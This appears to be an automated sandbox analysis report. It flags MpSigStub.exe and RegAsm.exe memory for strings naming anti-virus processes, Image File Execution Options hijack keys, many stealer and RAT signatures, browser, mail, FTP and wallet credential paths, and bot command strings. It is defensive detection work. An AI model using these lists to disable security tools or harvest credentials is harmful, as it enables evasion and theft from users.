Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: k7fwsrvc.exe
Source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp Binary or memory string: \avp.exe
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: KavPFW.EXE
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: MSMPENG.EXE
Source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp Binary or memory string: \kav.exe
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp Binary or memory string: 0{645FF040-5081-101B-9F08-00AA002F954E}\kav32.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: avkservice.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: virusutilities.exe
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: McAfee.com\VSO\Mcshield.exe
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.manifest.|!\SavService.exe
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp Binary or memory string: autoruns.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: k7rtscan.exe
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: SPIDERNT.EXE
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp Binary or memory string: mcagent.exe
Source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp Binary or memory string: msascui.exe
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: ICESWORD.EXE
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: avkproxy.exe
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp Binary or memory string: AyAgent.aye
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp Binary or memory string: AVGcsrvx.exe
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp Binary or memory string: RC:\Program Files\Wireshark\wireshark.exe
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: AVP.EXE
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp Binary or memory string: bdss.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: sbamsvc.exe
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp Binary or memory string: Vsserv.exe
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: IceSword.exe
Source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: clamwin.exe
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: kvxp.kxp
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp Binary or memory string: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: fsma32.exe
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp Binary or memory string: MSASCui.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: acs.exe
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: Ravmond.exe
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: avp.exe
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: 360safe.exe
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: RavTask.exe
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp Binary or memory string: Wireshark.exe
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: 360Safe.exe
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: KAV32.exe
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp Binary or memory string: c:\123.exe
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp Binary or memory string: *.jpg.|!\SavService.exe
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp Binary or memory string: avgnt.exe
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: a2guard.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: mbam.exe
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp Binary or memory string: (\avp.exe
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp Binary or memory string: FSMB32.EXE
Source: MpSigStub.exe, 00000023.00000003.18312179621.0000015B1C06C000.00000004.00000001.sdmp Binary or memory string: Image File Execution Options\msmpeng.exeDebuggerImage File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: avktray.exe
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: Regshot.exe
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: nod32kui.exe
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: KAVPFW.exe
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: KPFW32.EXE
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp Binary or memory string: mcshield.exe
Source: MpSigStub.exe, 00000023.00000003.18287345828.0000015B08195000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp Binary or memory string: avgui.exe
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\123.EXE
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp Binary or memory string: \App Paths\360Safe.exe
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp Binary or memory string: AVGcmgr.exe
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: fsav.exe
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp Binary or memory string: delc:\programme\"windowsdefender"\msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp, mpam-f54ed867.exe Binary or memory string: MsMpEng.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: onlinent.exe
Source: MpSigStub.exe, 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp Binary or memory string: \MsMpEng.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: cmdagent.exe
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp Binary or memory string: FSAV32.exe
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: avguard.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: fpwin.exe
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: zlclient.exe
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: avgtray.exe
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp Binary or memory string: McShield.exe
Source: MpSigStub.exe, 00000023.00000003.18294597236.0000015B1A5CB000.00000004.00000001.sdmp Binary or memory string: RImage File Execution Options\MSMPENG.exe
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp Binary or memory string: regedit.com
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp Binary or memory string: TmPfw.exe
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp Binary or memory string: KVMonXP.kxp
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: procexp.exe
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp Binary or memory string: %installlocation%\msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: license.rtf.|!\SavService.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: k7tsecurity.exe
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp Binary or memory string: /delc:\programme\"windowsdefender"\msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp Binary or memory string: Mcshield.exe
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp Binary or memory string: regmon.exe

Stealing of Sensitive Information:

barindex
Yara detected Snake Keylogger
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Evrial Stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected GhostRat
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Mini RAT
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Koadic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Generic Dropper
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected ISRStealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Mimikatz
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected LaZagne password dumper
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Discord Token Stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected MailPassView
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Parallax RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match File source: 00000008.00000002.21904007601.000000001E471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5916, type: MEMORYSTR
Yara detected Valak
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Pony
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Betabot
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Nukesped
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Codoso Ghost
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Growtopia
Source: Yara match File source: 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Dorkbot
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: secondexodusrealtors.co.ke
Source: MpSigStub.exe, 00000023.00000003.18350289745.0000015B1B712000.00000004.00000001.sdmp String found in binary or memory: PUA:Block:Ethereum
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: MpSigStub.exe, 00000023.00000003.18289300479.0000015B1BD55000.00000004.00000001.sdmp String found in binary or memory: get_UseMachineKeyStore
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Tries to steal Mail credentials (via file access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.21904007601.000000001E471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5916, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected Snake Keylogger
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Evrial Stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected GhostRat
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Mini RAT
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Koadic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Hancitor
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Meterpreter
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected ISRStealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Detected HawkEye Rat
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: HawkEyeKeylogger
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: HawkEyeKeylogger]
Detected Remcos RAT
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: Remcos_Mutex_Inj
Yara detected RevengeRAT
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Metasploit Payload
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Yara detected Discord Token Stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Parallax RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match File source: 00000008.00000002.21904007601.000000001E471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5916, type: MEMORYSTR
Yara detected Valak
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Detected Nanocore Rat
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Yara detected NetWire RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Linux EvilGnome RC5 key
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Pony
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Detected Imminent RAT
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: *\ClientPlugin\obj\Release\ClientPlugin.pdb
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Betabot
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Nukesped
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Codoso Ghost
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Growtopia
Source: Yara match File source: 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Dorkbot
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Contains VNC / remote desktop functionality (version string found)
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: rfb 003.008
Source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp String found in binary or memory: RFB 003.008
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: wfreerdp.dll
Yara detected RemCom RemoteAdmin tool
Source: Yara match File source: 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18333848371.0000015B1A546000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Contains strings related to BOT control commands
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: cmd=getload&login=
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: .php?cmd=login_submit&id=$praga$praga&session=$praga$praganame=chalbhaiid=chalbhaimethod=post>
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
